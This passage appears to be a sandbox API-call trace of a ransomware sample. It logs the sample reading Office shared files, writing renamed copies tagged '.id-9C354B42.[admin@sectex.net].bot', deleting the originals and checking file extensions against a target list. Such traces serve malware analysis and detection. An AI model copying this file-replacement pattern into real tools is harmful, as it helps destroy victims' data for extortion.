	[0051.753] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 0x20
	[0051.753] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0051.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8
	[0051.753] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.753] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0051.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204
	[0052.099] GetLastError () returned 0x0
	[0052.099] ReadFile (in: hFile=0x1a8, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xf2b88, lpOverlapped=0x0) returned 1
	[0052.118] WriteFile (in: hFile=0x204, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xf2b90, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xf2b90, lpOverlapped=0x0) returned 1
	[0052.137] ReadFile (in: hFile=0x1a8, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0052.137] WriteFile (in: hFile=0x204, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0052.137] SetEndOfFile (hFile=0x204) returned 1
	[0052.137] CloseHandle (hObject=0x204) returned 1
	[0052.138] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0052.138] SetEndOfFile (hFile=0x1a8) returned 1
	[0052.326] CloseHandle (hObject=0x1a8) returned 1
	[0052.326] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0052.326] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\dw\\dw20.exe")) returned 1
	[0052.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.326] lstrlenW (lpString=".doc") returned 4
	[0052.326] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0052.326] lstrlenW (lpString=".docx") returned 5
	[0052.326] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0052.326] lstrlenW (lpString=".pdf") returned 4
	[0052.326] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0052.326] lstrlenW (lpString=".xls") returned 4
	[0052.326] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0052.326] lstrlenW (lpString=".xlsx") returned 5
	[0052.326] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0052.326] lstrlenW (lpString=".ppt") returned 4
	[0052.326] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0052.326] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.326] lstrlenW (lpString=".zip") returned 4
	[0052.327] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString=".rar") returned 4
	[0052.327] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString=".bz2") returned 4
	[0052.327] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0052.327] lstrlenW (lpString=".7z") returned 3
	[0052.327] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString=".dbf") returned 4
	[0052.327] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString=".1cd") returned 4
	[0052.327] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString=".jpg") returned 4
	[0052.327] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString=".doc") returned 4
	[0052.327] lstrcmpiW (lpString1=".doc", lpString2=".EXE") returned -1
	[0052.327] lstrlenW (lpString=".docx") returned 5
	[0052.327] lstrcmpiW (lpString1=".docx", lpString2="0.EXE") returned -1
	[0052.327] lstrlenW (lpString=".pdf") returned 4
	[0052.327] lstrcmpiW (lpString1=".pdf", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString=".xls") returned 4
	[0052.327] lstrcmpiW (lpString1=".xls", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString=".xlsx") returned 5
	[0052.327] lstrcmpiW (lpString1=".xlsx", lpString2="0.EXE") returned -1
	[0052.327] lstrlenW (lpString=".ppt") returned 4
	[0052.327] lstrcmpiW (lpString1=".ppt", lpString2=".EXE") returned 1
	[0052.327] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.327] lstrlenW (lpString=".zip") returned 4
	[0052.327] lstrcmpiW (lpString1=".zip", lpString2=".EXE") returned 1
	[0052.328] lstrlenW (lpString=".rar") returned 4
	[0052.328] lstrcmpiW (lpString1=".rar", lpString2=".EXE") returned 1
	[0052.328] lstrlenW (lpString=".bz2") returned 4
	[0052.328] lstrcmpiW (lpString1=".bz2", lpString2=".EXE") returned -1
	[0052.328] lstrlenW (lpString=".7z") returned 3
	[0052.328] lstrcmpiW (lpString1=".7z", lpString2="EXE") returned -1
	[0052.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.328] lstrlenW (lpString=".dbf") returned 4
	[0052.328] lstrcmpiW (lpString1=".dbf", lpString2=".EXE") returned -1
	[0052.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.328] lstrlenW (lpString=".1cd") returned 4
	[0052.328] lstrcmpiW (lpString1=".1cd", lpString2=".EXE") returned -1
	[0052.328] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DW20.EXE") returned 58
	[0052.328] lstrlenW (lpString=".jpg") returned 4
	[0052.328] lstrcmpiW (lpString1=".jpg", lpString2=".EXE") returned 1
	[0052.328] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0052.328] lstrlenW (lpString="EPSIMP32.FLT") returned 12
	[0052.328] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0053.674] GetFileSizeEx (in: hFile=0x228, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=712592) returned 1
	[0053.674] CloseHandle (hObject=0x228) returned 1
	[0053.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20
	[0053.674] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228
	[0053.675] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.675] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c
	[0053.675] GetLastError () returned 0x0
	[0053.675] ReadFile (in: hFile=0x228, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0xadf90, lpOverlapped=0x0) returned 1
	[0053.689] WriteFile (in: hFile=0x23c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xadfa0, lpOverlapped=0x0) returned 1
	[0053.701] ReadFile (in: hFile=0x228, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.701] WriteFile (in: hFile=0x23c, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.701] SetEndOfFile (hFile=0x23c) returned 1
	[0053.701] CloseHandle (hObject=0x23c) returned 1
	[0053.701] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.701] SetEndOfFile (hFile=0x228) returned 1
	[0053.707] CloseHandle (hObject=0x228) returned 1
	[0053.707] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.707] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1
	[0053.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.707] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.707] lstrlenW (lpString=".doc") returned 4
	[0053.707] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.707] lstrlenW (lpString=".docx") returned 5
	[0053.707] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.708] lstrlenW (lpString=".pdf") returned 4
	[0053.708] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString=".xls") returned 4
	[0053.708] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString=".xlsx") returned 5
	[0053.708] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.708] lstrlenW (lpString=".ppt") returned 4
	[0053.708] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString=".zip") returned 4
	[0053.708] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString=".rar") returned 4
	[0053.708] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString=".bz2") returned 4
	[0053.708] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.708] lstrlenW (lpString=".7z") returned 3
	[0053.708] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString=".dbf") returned 4
	[0053.708] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString=".1cd") returned 4
	[0053.708] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString=".jpg") returned 4
	[0053.708] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.708] lstrlenW (lpString=".doc") returned 4
	[0053.708] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.708] lstrlenW (lpString=".docx") returned 5
	[0053.708] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.708] lstrlenW (lpString=".pdf") returned 4
	[0053.708] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.709] lstrlenW (lpString=".xls") returned 4
	[0053.709] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.709] lstrlenW (lpString=".xlsx") returned 5
	[0053.709] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.709] lstrlenW (lpString=".ppt") returned 4
	[0053.709] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.709] lstrlenW (lpString=".zip") returned 4
	[0053.709] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.709] lstrlenW (lpString=".rar") returned 4
	[0053.709] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.709] lstrlenW (lpString=".bz2") returned 4
	[0053.709] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.709] lstrlenW (lpString=".7z") returned 3
	[0053.709] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.709] lstrlenW (lpString=".dbf") returned 4
	[0053.709] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.709] lstrlenW (lpString=".1cd") returned 4
	[0053.709] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.709] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67
	[0053.709] lstrlenW (lpString=".jpg") returned 4
	[0053.709] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.709] lstrcmpiW (lpString1=".FLT", lpString2=".bot") returned 1
	[0053.709] lstrlenW (lpString="JPEGIM32.FLT") returned 12
	[0053.709] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.800] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=241024) returned 1
	[0053.800] CloseHandle (hObject=0x22c) returned 1
	[0053.800] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 0x20
	[0053.801] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0053.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.801] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.801] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.801] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170
	[0053.801] GetLastError () returned 0x0
	[0053.801] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x3ad80, lpOverlapped=0x0) returned 1
	[0053.806] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0x3ad90, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0x3ad90, lpOverlapped=0x0) returned 1
	[0053.810] ReadFile (in: hFile=0x22c, lpBuffer=0xac70020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa05fed4, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesRead=0xa05fed4*=0x0, lpOverlapped=0x0) returned 1
	[0053.810] WriteFile (in: hFile=0x170, lpBuffer=0xac70020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa05fc9c, lpOverlapped=0x0 | out: lpBuffer=0xac70020*, lpNumberOfBytesWritten=0xa05fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0053.810] SetEndOfFile (hFile=0x170) returned 1
	[0053.810] CloseHandle (hObject=0x170) returned 1
	[0053.810] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa05fec8 | out: lpNewFilePointer=0x0) returned 1
	[0053.810] SetEndOfFile (hFile=0x22c) returned 1
	[0053.827] CloseHandle (hObject=0x22c) returned 1
	[0053.827] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0053.827] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt")) returned 1
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString=".doc") returned 4
	[0053.828] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.828] lstrlenW (lpString=".docx") returned 5
	[0053.828] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.828] lstrlenW (lpString=".pdf") returned 4
	[0053.828] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.828] lstrlenW (lpString=".xls") returned 4
	[0053.828] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.828] lstrlenW (lpString=".xlsx") returned 5
	[0053.828] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.828] lstrlenW (lpString=".ppt") returned 4
	[0053.828] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString=".zip") returned 4
	[0053.828] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.828] lstrlenW (lpString=".rar") returned 4
	[0053.828] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.828] lstrlenW (lpString=".bz2") returned 4
	[0053.828] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.828] lstrlenW (lpString=".7z") returned 3
	[0053.828] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString=".dbf") returned 4
	[0053.828] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString=".1cd") returned 4
	[0053.828] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.828] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.828] lstrlenW (lpString=".jpg") returned 4
	[0053.829] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString=".doc") returned 4
	[0053.829] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1
	[0053.829] lstrlenW (lpString=".docx") returned 5
	[0053.829] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1
	[0053.829] lstrlenW (lpString=".pdf") returned 4
	[0053.829] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString=".xls") returned 4
	[0053.829] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString=".xlsx") returned 5
	[0053.829] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1
	[0053.829] lstrlenW (lpString=".ppt") returned 4
	[0053.829] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString=".zip") returned 4
	[0053.829] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString=".rar") returned 4
	[0053.829] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1
	[0053.829] lstrlenW (lpString=".bz2") returned 4
	[0053.829] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1
	[0053.829] lstrlenW (lpString=".7z") returned 3
	[0053.829] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString=".dbf") returned 4
	[0053.829] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString=".1cd") returned 4
	[0053.829] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1
	[0053.829] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT") returned 67
	[0053.829] lstrlenW (lpString=".jpg") returned 4
	[0053.830] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1
	[0053.830] lstrcmpiW (lpString1=".CGM", lpString2=".bot") returned 1
	[0053.830] lstrlenW (lpString="MS.CGM") returned 6
	[0053.830] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c
	[0053.830] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0xa05ff1c | out: lpFileSize=0xa05ff1c*=1908) returned 1
	[0053.830] CloseHandle (hObject=0x22c) returned 1
	[0053.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm")) returned 0x20
	[0053.830] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\MS.CGM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\ms.cgm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
